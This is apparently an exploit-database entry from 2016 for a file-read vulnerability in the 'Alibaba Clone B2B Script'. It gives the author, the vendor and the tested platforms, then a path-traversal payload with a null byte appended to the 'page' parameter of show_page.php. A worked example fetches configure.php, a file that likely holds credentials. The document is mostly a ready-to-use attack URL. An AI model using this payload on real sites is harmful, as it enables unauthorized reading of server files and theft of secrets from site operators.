12 lines
No EOL
392 B
Text
12 lines
No EOL
392 B
Text
# Exploit Title: Alibaba Clone B2B Script File Read Vulnerability
|
|
# Date: 2016-06-22
|
|
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
|
|
# Vendor Homepage: http://alibaba-clone.com/
|
|
# Version: All Versions
|
|
# Tested on: CentOS and Windows
|
|
|
|
Exploit :
|
|
http://site/show_page.php?page=../[FilePath]%00
|
|
|
|
Example :
|
|
http://site/show_page.php?page=../configure.php%00 |